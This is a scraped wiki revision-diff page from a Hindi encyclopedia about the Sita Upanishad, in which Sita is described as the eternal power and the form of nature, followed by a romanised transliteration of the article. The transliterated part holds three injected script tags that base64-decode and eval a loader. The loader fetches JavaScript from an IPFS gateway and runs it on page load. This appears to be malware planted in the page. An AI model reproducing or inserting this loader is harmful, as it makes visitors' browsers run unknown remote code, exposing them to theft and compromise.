Difference between revisions of "सीता उपनिषद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
==सीता उपनिषद==
+
{{इन्हें भी देखें |सीता}}
 +
 
 
*इस अथर्ववेदीय उपनिषद में देवगण तथा प्रजापति के मध्य हुए प्रश्नोत्तर में '[[सीता]]' को शाश्वत शक्ति का आधार माना गया है।  
 
*इस अथर्ववेदीय उपनिषद में देवगण तथा प्रजापति के मध्य हुए प्रश्नोत्तर में '[[सीता]]' को शाश्वत शक्ति का आधार माना गया है।  
 
*इसमें सीता को प्रकृति का स्वरूप बताया गया है।  
 
*इसमें सीता को प्रकृति का स्वरूप बताया गया है।  
Line 5: Line 6:
 
*सीता को भगवान श्री[[राम]] का सान्निध्य प्राप्त है, जिसके कारण वे विश्वकल्याणकारी हैं। सीता-क्रिया-शक्ति, इच्छा-शक्ति और ज्ञान-शक्ति-तीनों रूपों में प्रकट होती है। परमात्मा की क्रिया-शक्ति-रूपा सीता भगवान श्री हरि के मुख से 'नाद' रूप में प्रकट हुई है।  
 
*सीता को भगवान श्री[[राम]] का सान्निध्य प्राप्त है, जिसके कारण वे विश्वकल्याणकारी हैं। सीता-क्रिया-शक्ति, इच्छा-शक्ति और ज्ञान-शक्ति-तीनों रूपों में प्रकट होती है। परमात्मा की क्रिया-शक्ति-रूपा सीता भगवान श्री हरि के मुख से 'नाद' रूप में प्रकट हुई है।  
  
<br />
+
==संबंधित लेख==
==उपनिषद के अन्य लिंक==
+
{{संस्कृत साहित्य}}
{{उपनिषद}}
 
 
{{अथर्ववेदीय उपनिषद}}
 
{{अथर्ववेदीय उपनिषद}}
 
[[Category:दर्शन कोश]]
 
[[Category:दर्शन कोश]]
[[Category:उपनिषद]]
+
[[Category:उपनिषद]][[Category:संस्कृत साहित्य]]
 
   
 
   
 
__INDEX__
 
__INDEX__

Latest revision as of 13:46, 13 October 2011

  1. REDIRECTsaancha:nila<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>inhean bhi dekhean
  2. REDIRECTsaancha:nila band<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>: sita
  • is atharvavediy upanishad mean devagan tatha prajapati ke madhy hue prashnottar mean 'sita' ko shashvat shakti ka adhar mana gaya hai.
  • isamean sita ko prakriti ka svaroop bataya gaya hai.
  • sita shabd ka arth aksharabrahm ki shakti ke roop mean hua hai. yah nam sakshat 'yogamaya' ka hai.
  • sita ko bhagavan shriram ka sannidhy prapt hai, jisake karan ve vishvakalyanakari haian. sita-kriya-shakti, ichchha-shakti aur jnan-shakti-tinoan roopoan mean prakat hoti hai. paramatma ki kriya-shakti-roopa sita bhagavan shri hari ke mukh se 'nad' roop mean prakat huee hai.

sanbandhit lekh

shrutiyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>